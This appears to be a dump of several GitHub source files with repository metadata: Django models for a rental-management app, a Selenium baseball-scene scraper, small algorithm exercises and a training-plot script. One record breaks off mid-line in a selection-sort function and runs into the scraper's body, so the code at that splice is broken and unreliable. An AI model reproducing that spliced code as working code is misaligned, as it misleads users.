verbose_name='CPF')\n fiador_ocupacao = models.CharField(max_length=85, null=True, blank=True, verbose_name='Ocupação')\n fiador_endereco_completo = models.CharField(null=True, blank=True, max_length=150, verbose_name='Endereço Completo')\n fiador_nacionalidade = models.CharField(max_length=40, null=True, blank=True, verbose_name='Nacionalidade')\n fiador_estadocivil = models.IntegerField(null=True, blank=True, verbose_name='Estado Civil', choices=estados_civis)\n\n class Meta:\n verbose_name_plural = 'Configs de contratos'\n\n def __str__(self):\n return f'{self.do_contrato} ({self.do_modelo})'\n\n def f_cpf(self):\n return cpf_format(self.fiador_CPF)\n\n\nclass Parcela(models.Model):\n do_usuario = models.ForeignKey('Usuario', blank=False, on_delete=models.CASCADE)\n do_contrato = models.ForeignKey('Contrato', null=False, blank=False, on_delete=models.CASCADE)\n do_imovel = models.ForeignKey('Imovei', null=False, blank=False, 
on_delete=models.CASCADE)\n do_locatario = models.ForeignKey('Locatario', null=False, blank=False, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, on_delete=models.SET_NULL)\n codigo = models.CharField(blank=False, null=False, editable=False, max_length=7, unique_for_month=True,\n default=parcela_uuid)\n data_pagm_ref = models.DateField(null=False, blank=False,\n help_text='Data referente ao vencimento do pagamento desta parcela')\n tt_pago = models.CharField(max_length=9, blank=False, default=0)\n recibo_entregue = models.BooleanField(default=False)\n apagada = models.BooleanField(default=False)\n\n def __str__(self):\n return (f'Parcela do contr.: {str(self.do_contrato.codigo)}/{self.do_locatario.primeiro_ultimo_nome()}/'\n f'{self.do_imovel}({self.data_pagm_ref.strftime(\"%B/%Y\")})')\n\n def tt_pago_format(self):\n return valor_format(self.tt_pago)\n\n def falta_pagar_format(self):\n contrato = Contrato.objects.get(pk=self.do_contrato.pk)\n return valor_format(str(int(contrato.valor_mensal) - int(self.tt_pago)))\n\n def esta_pago(self):\n contrato = Contrato.objects.get(pk=self.do_contrato.pk)\n return True if int(self.tt_pago) == int(contrato.valor_mensal) else False\n\n def esta_vencido(self):\n return True if datetime.today().date() > self.data_pagm_ref else False\n\n def posicao(self):\n try:\n parcelas = list(\n Parcela.objects.filter(do_contrato=self.do_contrato, apagada=False).values_list('pk', flat=True))\n parcela = self.pk\n return parcelas.index(parcela) + 1\n except:\n return None\n\n def definir_apagada(self):\n self.apagada = True\n self.save(update_fields=['apagada'])\n\n def restaurar(self):\n self.apagada = False\n self.save(update_fields=['apagada'])\n\n def de_contrato_ativo(self):\n if (self.do_contrato.periodo_ativo_hoje() and self.do_contrato.em_posse is True and self.do_contrato.rescindido\n is False):\n return True\n else:\n return False\n\n\nlista_pagamentos = (\n (0, 'PIX'),\n (1, 'Din. Espécie'),\n (2, 'Boleto Banc.'),\n (3, 'Tranfer. 
Banc.'))\n\n\nclass Pagamento(models.Model):\n ao_locador = models.ForeignKey('Usuario', on_delete=models.CASCADE)\n ao_contrato = models.ForeignKey('Contrato', on_delete=models.CASCADE,\n verbose_name='Do Contrato')\n do_locatario = models.ForeignKey('Locatario', on_delete=models.CASCADE)\n\n valor_pago = models.CharField(max_length=9, verbose_name='Valor Pago (R$) ', blank=False,\n validators=[apenas_numeros])\n data_pagamento = models.DateTimeField(blank=False, verbose_name='Data do Pagamento')\n data_de_recibo = models.DateTimeField(blank=True, verbose_name='Data em que foi marcado recibo entregue', null=True)\n forma = models.IntegerField(blank=False, choices=lista_pagamentos, verbose_name='Forma de Pagamento')\n data_criacao = models.DateTimeField(auto_now_add=True)\n\n def valor_format(self):\n return valor_format(self.valor_pago)\n\n def __str__(self):\n return f'{self.do_locatario} - R${self.valor_format()} - {self.data_pagamento.strftime(\"%D\")}'\n\n\nclass Gasto(models.Model):\n do_locador = models.ForeignKey('Usuario', null=False, on_delete=models.CASCADE)\n do_imovel = models.ForeignKey('Imovei', blank=True, null=True, on_delete=models.CASCADE,\n help_text='Deixe em branco para registrar um gasto avulso')\n\n valor = models.CharField(max_length=9, verbose_name='Valor Gasto (R$) ', blank=False, validators=[apenas_numeros])\n data = models.DateTimeField(blank=False)\n observacoes = models.TextField(max_length=500, blank=True, verbose_name='Observações')\n comprovante = ResizedImageField(size=[1280, None], upload_to='gastos_comprovantes/%Y/%m/', blank=True,\n verbose_name='Comporvante', validators=[tratar_imagem, FileExtensionValidator])\n data_criacao = models.DateTimeField(auto_now_add=True)\n\n def get_alsolute_url(self):\n return reverse('home:Gastos', args=[(str(self.pk)), ])\n\n def valor_format(self):\n return valor_format(self.valor)\n\n def __str__(self):\n return f'{self.observacoes[:20]} - {self.valor_format()} - {self.data.strftime(\"%D\")}'\n\n\nclass Anotacoe(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=False, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n titulo = models.CharField(blank=False, max_length=100, verbose_name='Título')\n data_registro = models.DateTimeField(blank=True)\n texto = models.TextField(blank=True, null=True)\n tarefa = models.BooleanField(default=False,\n help_text='Marque para adicionar este registro na sua lista de tarefas.')\n feito = models.BooleanField(default=False)\n\n class Meta:\n verbose_name_plural = 'Anotações'\n\n def tipo(self):\n if self.tarefa:\n if self.feito:\n return 'Tarefa concluída'\n else:\n return 'Tarefa pendente'\n else:\n return 'Anotação'\n\n def __str__(self):\n return f'{self.titulo} - {self.data_registro.strftime(\"%d/%m/%Y\")}'\n\n def texto_pequeno(self):\n tamanho = 50\n if len(self.texto) == 0:\n return [0, '---']\n elif len(self.texto) < tamanho:\n return [1, self.texto]\n else:\n return [2, f'{self.texto[:tamanho]}...']\n\n\nclass TarefaManager(models.Manager):\n def tarefas_novas(self):\n tarefas_qs = self.filter(apagada=False)\n lista = []\n for tarefa in tarefas_qs:\n if tarefa.tarefa_nova() is True:\n lista.append(tarefa.pk)\n tarefas_novas = Tarefa.objects.filter(pk__in=lista)\n return tarefas_novas\n\n def tarefas_historico(self):\n tarefas_qs = self.filter(apagada=False)\n lista = []\n for tarefa in tarefas_qs:\n if tarefa.tarefa_nova() is False:\n lista.append(tarefa.pk)\n tarefas_novas = 
Tarefa.objects.filter(pk__in=lista)\n        return tarefas_novas\n\n\nclass Tarefa(models.Model):\n    do_usuario = models.ForeignKey('Usuario', null=False, on_delete=models.CASCADE)\n    autor_classe = models.ForeignKey(ContentType, null=False, on_delete=models.CASCADE)\n    objeto_id = models.PositiveIntegerField(null=False)\n    content_object = GenericForeignKey('autor_classe', 'objeto_id')\n\n    data_registro = models.DateTimeField(auto_now_add=True)\n    lida = models.BooleanField(null=True)\n    apagada = models.BooleanField(default=False)\n    data_lida = models.DateTimeField(null=True)\n    objects = TarefaManager()\n\n    class Meta:\n        ordering = ['-data_registro']\n\n    def __str__(self):\n        return f'Tarefa: classe:{self.autor_classe}/objeto_id:{self.objeto_id}'\n\n    def autor_tipo(self):\n        if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n            return 1\n        elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n            return 2\n        elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n            return 3\n        elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n            return 4\n        elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n            return 5\n        elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n            return 6\n\n    def autor_tipo_display(self):\n        if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n            return '🧾 Recibo'\n        elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n            return '🗒️ Tarefa'\n        elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n            return '📃 Contrato'\n        elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n            return '⚠️ Aviso'\n        elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n            return '👨‍💼 Locatário'\n        elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n            return '⚠️ Aviso'\n\n    def tarefa_nova(self):\n        # Vai retornar True ou None; True se o autor desta tarefa ainda não estiver marcado como concluído (ps: concluídos em\n        # seus respectivos formatos; ex: recibo: 'recibo_entregue', ex: Anotação: 'feito', ex: contrato: 'em_posse',\n        # ex: sugestão: 'neste caso utiliza o próprio parâmetro 'lida' desta model.'...)\n        # Retorna None caso o objeto não exista (caso gere um except)\n        if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n            try:\n                return True if self.content_object.recibo_entregue is False else False\n            except:\n                return None\n        elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n            try:\n                return True if self.content_object.feito is False else False\n            except:\n                return None\n        elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n            try:\n                return True if self.content_object.em_posse is False else False\n            except:\n                return None\n        elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n            try:\n                return False if self.lida else True\n            except:\n                return None\n        elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n            try:\n                return True if self.content_object.temporario is True else False\n            except:\n                return None\n        elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n            try:\n                return False if self.lida else True\n            except:\n                return None\n\n    def borda(self):\n        if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n            return 'border-white'\n        elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n            return 'border-warning'\n        elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n            return 'border-primary'\n        elif 
self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n return 'border-success'\n elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n return 'border-secondary'\n elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n return 'border-success'\n\n def texto(self):\n mensagem = ''\n if self.autor_classe == ContentType.objects.get_for_model(Parcela):\n try:\n parcela = self.content_object\n mensagem = f'O Pagamento de {parcela.do_contrato.do_locatario.primeiro_ultimo_nome().upper()}' \\\n f' referente à parcela de {data_ptbr(parcela.data_pagm_ref, \"F/Y\").upper()}' \\\n f'(Parcela {parcela.posicao()} de {parcela.do_contrato.duracao}) do contrato ' \\\n f'{parcela.do_contrato.codigo} em {parcela.do_contrato.do_imovel} foi detectado. '\\\n f'Confirme a entrega do recibo.'\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Anotacoe):\n try:\n tamanho_max_txt = 200\n nota = self.content_object\n cortado = f'{nota.texto[:tamanho_max_txt]}...'\n mensagem = f'''{nota.titulo}
{nota.texto if len(nota.texto) <= tamanho_max_txt else cortado}'''\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Contrato):\n try:\n contrato = self.content_object\n mensagem = f'''O contrato {contrato} foi criado com sucesso!

\n Depois de:
\n 1. Gerar e imprimir o documento referente (Gerar PDF de Contrato),
\n 2. Entregar ao locatário para reconhecimento em cartório, e
\n 3. Recebê-lo novamente com a firma reconhecida.
\n Confirme a posse de sua via no botão abaixo para ativá-lo no sistema.'''\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Sugestao):\n try:\n tamanho_max_txt = 200\n sugestao = self.content_object\n cortado = f'{sugestao.corpo[:tamanho_max_txt]}...'\n mensagem = f'''Sua sugestão foi aprovada e está disponível para votação:
\n \"{sugestao.corpo if len(sugestao.corpo) <= tamanho_max_txt else cortado}\"'''\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Locatario):\n try:\n locatario = self.content_object\n mensagem = f'''Um novo locatário se registrou:
\n Nome: {locatario.nome}
\n Telefone: {cel_format(locatario.telefone1)}
\n Email: {locatario.email}'''\n except:\n pass\n elif self.autor_classe == ContentType.objects.get_for_model(Slot):\n try:\n slot = self.content_object\n mensagem = f'''O imóvel {slot.imovel()} está desabilitado, por favor, acesse o painel para \n habilitá-lo.'''\n except:\n pass\n return mensagem\n\n def definir_apagada(self):\n self.apagada = True\n self.save(update_fields=['apagada'])\n\n def restaurar(self):\n self.apagada = False\n self.save(update_fields=['apagada'])\n\n def definir_nao_lida(self):\n self.lida = False\n self.data_lida = None\n self.data_registro = datetime.now()\n self.save(update_fields=['lida', 'data_registro'])\n\n\nlista_mensagem = (\n (1, 'Elogio'),\n (2, 'Reclamação'),\n (3, 'Dúvida'),\n (4, 'Report de bug'))\n\n\nclass DevMensagen(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n\n data_registro = models.DateTimeField(auto_now=True)\n titulo = models.CharField(blank=False, max_length=100)\n mensagem = models.TextField(blank=False)\n tipo_msg = models.IntegerField(blank=False, choices=lista_mensagem)\n imagem = ResizedImageField(size=[1280, None], upload_to='mensagens_ao_dev/%Y/%m/', blank=True,\n validators=[tratar_imagem, FileExtensionValidator])\n\n class Meta:\n verbose_name_plural = 'Mensagens ao Dev'\n\n def __str__(self):\n return f'{self.do_usuario} - {self.titulo} - {self.data_registro}'\n\n\nclass Sugestao(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n data_registro = models.DateTimeField(auto_now=True)\n corpo = models.TextField(max_length=1500, blank=False, null=False, verbose_name='')\n imagem = ResizedImageField(size=[1280, None], upload_to='sugestoes_docs/%Y/%m/', blank=True,\n validators=[tratar_imagem, FileExtensionValidator], verbose_name='Imagem(opcional)')\n likes = models.ManyToManyField('Usuario', related_name='Likes', blank=True)\n implementada = models.BooleanField(default=False)\n aprovada = models.BooleanField(default=False)\n data_implementada = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n verbose_name_plural = 'Sugestões'\n\n def __str__(self):\n return f'{self.do_usuario} - {self.corpo[:30]} - {self.data_registro}'\n\n def numero_de_likes(self):\n return self.likes.count()\n","repo_name":"fbsagat/Alugue_seu_imovel","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":56182,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"9520381908","text":"def selection_sort(elem,n):\n for i in range(n):\n minindex = i\n for j in range(i+1,n):\n if(elem[j] 0:\n # 取得対象(開始) のイニング決定\n jsonOpen = open(\"{0}/{1}.json\".format(fullGamePath, fileCount))\n loadedJson = json.load(jsonOpen)\n # 保存済みの最新イニング\n savedLatestInningTopBtm = loadedJson[\"liveHeader\"][\"inning\"]\n print(\"----- game: {0}, savedLatestInningTopBtm: {1} -----\".format(gameNo, savedLatestInningTopBtm))\n # 試合終了まで取得済みの場合、保存対象外\n if savedLatestInningTopBtm in [\"試合終了\", \"試合中止\", \"ノーゲーム\"]:\n continue\n elif savedLatestInningTopBtm in [\"試合前\"]:\n # ファイルカウントを0に戻す\n fileCount = 0\n print('not start game')\n # 試合途中まで取得済みの場合\n else:\n currentInning, currentTopBtm = savedLatestInningTopBtm.split(\"回\")\n fromInning = int(currentInning)\n # \n if currentTopBtm == \"表\":\n # 2回表〜9回表の場合は「裏」にする\n fromTopBtm = \"裏\"\n # 2回裏〜9回裏の場合は、1つイニングを進めて「表」にする\n elif 
currentTopBtm == \"裏\":\n fromInning = fromInning + 1\n fromTopBtm = \"表\"\n\n # 指定のイニングに遷移\n selectorInning = getInningSelector(fromInning, fromTopBtm)\n contentMain.find_element_by_css_selector(selectorInning).click()\n commonWait()\n\n # 取得対象(開始) 1回裏以降の場合\n if fromInning > 1 or fromTopBtm == \"裏\":\n #「戻る」ボタン押下\n selectorPrevButton = \"#replay .back a\"\n contentMain.find_element_by_css_selector(selectorPrevButton).click()\n commonWait()\n while 1:\n # 現在の打者数\n currentBatterCnt = util.getText(\"inningBatterCnt\")\n # 投手変更、守備変更がない場合\n if len(currentBatterCnt) > 0:\n #「次へ」ボタン押下\n selectorNextButton = \"#replay .next a\"\n contentMain.find_element_by_css_selector(selectorNextButton).click()\n commonWait()\n # シート変更の初期シーンに移動したら抜ける\n break\n # 依然シートの変更がある場合は「戻る」ボタン押下\n else:\n contentMain.find_element_by_css_selector(selectorPrevButton).click()\n commonWait() \n\n # 処理開始シーン定義\n scene = fileCount\n\n try:\n while 1:\n data = {}\n scene += 1\n startTime = time.time()\n\n # ------------ ライブヘッダ ------------\n data[\"liveHeader\"] = {\n \"inning\": util.getText(\"inning\"),\n \"away\": {\n \"teamInitial\": util.getText(\"teamInitialAway\"),\n \"currentScore\": util.getText(\"currentScoreAway\")\n },\n \"home\": {\n \"teamInitial\": util.getText(\"teamInitialHome\"),\n \"currentScore\": util.getText(\"currentScoreHome\")\n },\n \"count\": {\n \"b\": len(util.getText(\"countBall\")),\n \"s\": len(util.getText(\"countStrike\")),\n \"o\": len(util.getText(\"countOut\"))\n }\n }\n # ------------ /ライブヘッダ ------------\n\n # ------------ ライブボディ ------------\n liveBody = {}\n # 打撃結果概要欄\n liveBody[\"battingResult\"] = util.getText(\"battingResult\")\n liveBody[\"pitchingResult\"] = util.getText(\"pitchingResult\")\n\n # 取得対象が存在しない場合、保存して終了\n if liveBody[\"battingResult\"] in [\"試合終了\", \"試合中止\", \"試合前\"]:\n data[\"liveBody\"] = liveBody\n # save as json\n with open(\"{0}/{1}.json\".format(fullGamePath, scene), 'w') as f:\n json.dump(data, f, indent=2, ensure_ascii=False)\n break\n\n # 取得対象(終了) が存在する場合\n if toInning > 0 and len(toTopBtm) > 0:\n # 取得対象範囲を超えた場合、保存せず終了\n currentInning, currentTopBtm = data[\"liveHeader\"][\"inning\"].split(\"回\")\n if int(currentInning) == toInning and currentTopBtm == toTopBtm:\n break;\n\n # 塁状況\n onbaseInfoElem = util.getElems(\"onbaseInfo\")\n onbaseInfo = []\n for elem in onbaseInfoElem:\n onbaseInfo.append({\n \"base\": elem.get_attribute(\"id\"),\n \"player\": elem.text\n })\n liveBody[\"onbaseInfo\"] = onbaseInfo\n\n # ボールリスト概要 (\"#dakyu .bottom #nxt_batt .balllist\") は省略\n # 現在打者概要\n liveBody[\"currentBatterInfo\"] = {\n \"name\": util.getText(\"currentBatterName\"),\n \"playerNo\": util.getText(\"currentBatterPlayerNo\"),\n \"domainHand\": util.getText(\"currentBatterDomainHand\"),\n \"average\": util.getText(\"currentBatterRate\"),\n \"prevResult\": util.getText(\"currentBatterPrevResult\"),\n }\n # 登板投手概要\n liveBody[\"currentPicherInfo\"] = {\n \"name\": util.getText(\"currentPitcherName\"),\n \"playerNo\": util.getText(\"currentPitcherPlayerNo\"),\n \"domainHand\": util.getText(\"currentPitcherHand\"),\n \"pitch\": util.getText(\"currentPitchCount\"),\n \"vsBatterCount\": util.getText(\"currentPitcherVSBatterCount\"),\n \"pitchERA\": util.getText(\"currentPitchERA\"),\n }\n # 次の打者\n liveBody[\"nextBatter\"] = util.getText(\"nextBatter\")\n # イニング打者数\n liveBody[\"inningBatterCnt\"] = util.getText(\"inningBatterCnt\")\n\n data[\"liveBody\"] = liveBody\n # ------------ /ライブボディ ------------\n\n commonWait() # liveheader, livebody 取得後に wait\n\n pitchInfo = {}\n # 
投球詳細\n pitchDetailsElem = util.getElems(\"pitchDetail\")\n pitchDetails = []\n for elem in pitchDetailsElem:\n pitchDetails.append({\n \"judgeIcon\": util.getSpecifyClass(elem, \"tr td:nth-child(1) span\").split(\" \")[1][-1:],\n \"pitchCnt\": util.getSpecifyText(elem, \"tr td:nth-child(2)\"),\n \"pitchType\": util.getSpecifyText(elem, \"tr td:nth-child(3)\"),\n \"pitchSpeed\": util.getSpecifyText(elem, \"tr td:nth-child(4)\"),\n \"pitchJudgeDetail\": util.getSpecifyText(elem, \"tr td:nth-child(5)\")\n })\n pitchInfo[\"pitchDetails\"] = pitchDetails\n\n # 投球コース\n pitchDetailsCourseElem = util.getElems(\"pitchingCourse\")\n allPitchCourse = []\n #\n for course in pitchDetailsCourseElem:\n courseDetailNum = re.findall(r'-?\\d+', course.get_attribute(\"style\"))\n # 0: top, 1: left\n allPitchCourse.append({\n \"top\": courseDetailNum[0],\n \"left\": courseDetailNum[1]\n })\n\n pitchInfo[\"allPitchCourse\"] = allPitchCourse\n\n def getGameResult(leftOrRight):\n return {\n \"title\": util.getText(\"gameResult\" + leftOrRight + \"Title\"),\n \"name\": util.getText(\"gameResult\" + leftOrRight + \"Name\"),\n \"domainHand\": util.getText(\"gameResult\" + leftOrRight + \"DomainHand\"),\n }\n\n # 対戦相手詳細\n pitchInfo[\"gameResult\"] = {\n \"left\": getGameResult(\"Left\"),\n \"right\": getGameResult(\"Right\"),\n }\n\n data[\"pitchInfo\"] = pitchInfo\n\n def createTeamInfo(homeAway):\n teamInfo = {}\n # チーム名\n teamInfo[\"name\"] = util.getTeamText(homeAway, \"teamName\")\n # 現在のオーダー\n teamOrder = []\n teamOrdeElem = util.getTeamElems(homeAway, \"teamOrder\")\n for elem in teamOrdeElem:\n if len(util.getSpecifyElems(elem, \"td\")) > 0:\n teamOrder.append({\n \"no\": util.getSpecifyText(elem, \"tr td:nth-child(1)\"),\n \"position\": util.getSpecifyText(elem, \"tr td:nth-child(2)\"),\n \"name\": util.getSpecifyText(elem, \"tr td:nth-child(3) a\"),\n \"domainHand\": util.getSpecifyText(elem, \"tr td:nth-child(4)\"),\n \"average\": util.getSpecifyText(elem, \"tr td:nth-child(5)\")\n })\n teamInfo[\"order\"] = teamOrder\n # バッテリー\n battelyInfoElem = util.getTeamElems(homeAway, \"teamBattery\")\n battelyInfo = \"\"\n for elem in battelyInfoElem:\n battelyInfo += elem.text\n teamInfo[\"batteryInfo\"] = battelyInfo\n # 本塁打\n homerunInfoElem = util.getTeamElems(homeAway, \"teamHomerun\")\n homerunInfo = \"\"\n for elem in homerunInfoElem:\n homerunInfo += elem.text\n teamInfo[\"homerunInfo\"] = homerunInfo\n\n def createBenchMemberInfo(memgersElem):\n benchMemberInfo = []\n for elem in memgersElem:\n if elem.get_attribute(\"class\") == \"bb-splitsTable__row\":\n benchMemberInfo.append({\n \"name\": util.getSpecifyText(elem, \"tr td:nth-child(1) a\"),\n \"domainHand\": util.getSpecifyText(elem, \"tr td:nth-child(2)\"),\n \"average\": util.getSpecifyText(elem, \"tr td:nth-child(3)\")\n })\n return benchMemberInfo\n\n # ベンチ入りメンバー(投手)\n teamInfo[\"benchPitcher\"] = createBenchMemberInfo(util.getTeamElems(homeAway, \"benchPitcherInfo\"))\n # ベンチ入りメンバー(捕手)\n teamInfo[\"benchCatcher\"] = createBenchMemberInfo(util.getTeamElems(homeAway, \"benchCatcherInfo\"))\n # ベンチ入りメンバー(内野手)\n teamInfo[\"benchInfielder\"] = createBenchMemberInfo(util.getTeamElems(homeAway, \"benchInfielderInfo\"))\n # ベンチ入りメンバー(外野手)\n teamInfo[\"benchOutfielder\"] = createBenchMemberInfo(util.getTeamElems(homeAway, \"benchOutfielderInfo\"))\n\n return teamInfo\n \n data[\"homeTeamInfo\"] = createTeamInfo(\"homeTeamElemId\")\n data[\"awayTeamInfo\"] = createTeamInfo(\"awayTeamElemId\")\n\n # save as json\n with 
open(\"{0}/{1}.json\".format(fullGamePath, scene), 'w') as f:\n json.dump(data, f, indent=2, ensure_ascii=False)\n\n print(\"----- [done] date: {0}, gameNo: {1}, scene: {2:3d}, inning: {3}, {4}アウト, {5:3.1f}[sec] -----\".format(\n dateStr,\n gameNo,\n scene,\n data[\"liveHeader\"][\"inning\"],\n data[\"liveHeader\"][\"count\"][\"o\"],\n time.time() - startTime\n ))\n\n #「次へ」ボタン押下\n selectorNextButton = \"#replay .next a\"\n contentMain.find_element_by_css_selector(selectorNextButton).click()\n commonWait()\n\n except TimeoutException as te:\n print(te)\n print(\"----- [error] date: {0}, gameNo: {1}, scene: {2:3d}, inning: {3}, {4}アウト, {5:3.1f}[sec] -----\".format(\n dateStr,\n gameNo,\n scene,\n data[\"liveHeader\"][\"inning\"],\n data[\"liveHeader\"][\"count\"][\"o\"],\n time.time() - startTime\n ))\n\n targetDate = targetDate + datetime.timedelta(days=1)\n util = Util(driver)\n\n driver.close()\n driver.quit()\n print(\"----- finished time: {0} -----\\n\\n\".format(datetime.datetime.now().strftime(\"%Y/%m/%d %H:%M:%S\")))\n\nexcept:\n driver.close()\n driver.quit()\n\n import traceback\n traceback.print_exc()\n","repo_name":"IsaUmetsu/py_baseball","sub_path":"game_scenes.py","file_name":"game_scenes.py","file_ext":"py","file_size_in_byte":19609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12149555563","text":"import sys\n\nn = int(sys.stdin.readline())\nfor _ in range(n):\n stk = 0\n mun = sys.stdin.readline().rstrip()\n mun = list(mun)\n for i in mun:\n if i == '(':\n stk += 1\n elif i == ')':\n stk -= 1\n if stk < 0:\n print('NO')\n break\n if stk > 0:\n print('NO')\n elif stk == 0:\n print('YES')\n","repo_name":"Jungwoo-20/CodingTestStudy","sub_path":"백준/9102.py","file_name":"9102.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"19336000911","text":"import numpy as np\nimport json\nfrom pprint import pprint\nimport math\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom test_json import process_json\n\nEPOCH = 1\n\ndef __get__data(file_path=None, print_data=False):\n\n\tassert file_path != None\n\n\tdata = json.load(open(file_path))\n\tprint_data = {} \n\n\tepi_success = []\n\tepi_loss = []\n\tcurr_epoch = 0\n\tfor episode,duration,episode_reward,loss,mae,mq,nbes,nb_steps,success_info in zip(data['episode'],data['duration'],data['episode_reward'],data['loss'],data['mean_absolute_error'],data['mean_q'],data['nb_episode_steps'],data['nb_steps'],data['infos']):\n\n\t\t#book keeping\n\t\tsuccess_val = float(success_info.split(':')[1])\n\t\tepi_success.append(success_val)\n\t\tepi_loss.append(0 if math.isnan(loss) else loss)\n\t\tif(episode%EPOCH==0):\n\t\t\tif math.isnan(mq):\n\t\t\t\tmq=0\n\t\t\tsuccess_val_mean = np.mean(epi_success)\n\t\t\tsuccess_val_std = np.std(epi_success)\n\t\t\tloss_mean = np.mean(epi_loss)\n\t\t\t# can add more data if needed\n\n\t\t\ttemp_data = [('epoch', curr_epoch), ('success_mean', success_val_mean), ('success_std', success_val_std), ('loss_mean', loss_mean)]\n\t\t\tfor key, value in temp_data:\n\t\t\t\tif key not in print_data:\n\t\t\t\t print_data[key] = []\n\t\t\t\tprint_data[key].append(value)\n\n\t\t\t#reset\n\t\t\tepi_success = []\n\t\t\tepi_loss = []\n\t\t\tcurr_epoch += 1\n\t\t\t#validate\n\t\t\tif(print_data==True):\n\t\t\t\ttemplate = 'episode: {episode}, duration: {duration:.3f}s, episode_reward: {episode_reward:.3f}, loss: {loss:.3f}, mean_q: 
{mean_q:.3f}, success_rate: {success_info:.3f}'\n\t\t\t\tvariables = {\n\t\t\t           'nb_steps': nb_steps,\n\t\t\t           'episode': episode + 1,\n\t\t\t           'duration': duration,\n\t\t\t           'mean_q': mq,\n\t\t\t           'episode_steps': nbes,\n\t\t\t           'sps': float(nbes) / duration,\n\t\t\t           'loss':loss,\n\t\t\t           'episode_reward': episode_reward,\n\t\t\t           'success_info':float(success_val)\n\t\t\t       }\n\t\t\t\tprint(template.format(**variables))\n\treturn print_data\n\ndef plot_af(file_path=None,preprocess_json=True,save_file_name='temp_plot.png',plot_what='success',plot_num=0,label=None,color_vector=['blue', 'red', 'black', 'green', 'magenta', 'green','cyan', 'yellow', 'brown','gray','olive','orange','pink','salmon','hotpink','palegoldenrod','mediumseagreen','sienna','tomato']):\n\n\tif(file_path==None):\n\t\tprint('could not find a path to training .json file')\n\n\telse:\n\t\tif(preprocess_json):\n\t\t\tprocess_json(file_path)\n\t\t\tfile_path = \"data/temp.json\"\n\t\tprint_data = __get__data(file_path)\t#print_data has form {'epoch': [], 'success_mean': [], 'success_std': []}\n\t\textension = 'success_rate'\n\t\tplot = None\n\t\tif(plot_what=='success'):\n\t\t\tprint(\"Plotting accuracy...\")\n\t\t\ty = np.asarray(print_data['success_mean'])\n\t\t\tx = np.asarray(print_data['epoch'])\n\t\t\te = np.asarray(print_data['success_std'])\n\t\t\tif(e.shape[0]>1):\n\t\t\t\tplot, = plt.plot(np.squeeze(x),np.squeeze(y),label=label,linewidth=1.0,color=color_vector[plot_num])\n\t\t\t\tplt.fill_between(np.squeeze(x), np.squeeze(y)-np.squeeze(e), np.squeeze(y)+np.squeeze(e), color=color_vector[plot_num], alpha=0.2, label=label)\n\t\t\telse:\n\t\t\t\tplot = None\n\t\t\t\n\t\telif(plot_what=='loss'):\n\t\t\tprint(\"Plotting loss...\")\n\t\t\ty = np.asarray(print_data['loss_mean'])\n\t\t\tx = np.asarray(print_data['epoch'])\n\t\t\tplt.plot(np.squeeze(x), np.squeeze(y))\n\t\t\textension = 'train_loss'\n\t\tprint(\"Plot saved.\")\n\t\treturn plot\n\nif __name__ == '__main__':\n\timport os\n\timport sys\n\tif(len(sys.argv)==2):\n\t\tpath = str(sys.argv[1])\n\t##graph0\t\n\t# label_names = ['DDPG', 'PER']\n\t##graph1\n\t# label_names = ['Vanilla DDPG','\"episode\" strategy with K=1', '\"episode\" strategy with K=4', '\"episode\" strategy with K=8', '\"future\" strategy with K=1', '\"future\" strategy with K=4', '\"future\" strategy with K=8']\n\t##graph 2\n\t# label_names = ['\"episode\" strategy with K=4', '\"episode\" strategy with K=8', '\"episode\" strategy with K=24', '\"future\" strategy with K=4', '\"future\" strategy with K=8', '\"future\" strategy with K=24']\n\t##graph3_1\n\t# label_names = ['\"episode\" strategy with alpha=0.3', '\"episode\" strategy with alpha=0.7', '\"episode\" strategy with alpha=0.9', '\"episode\" strategy with alpha=0']\n\t##graph3_2\n\t# label_names = ['\"future\" strategy with alpha=0.3', '\"future\" strategy with alpha=0.7', '\"future\" strategy with alpha=0.9', '\"future\" strategy with alpha=0']\n\t##graph4\n\t# label_names = ['\"episode\" strategy with K=4', '\"episode\" strategy 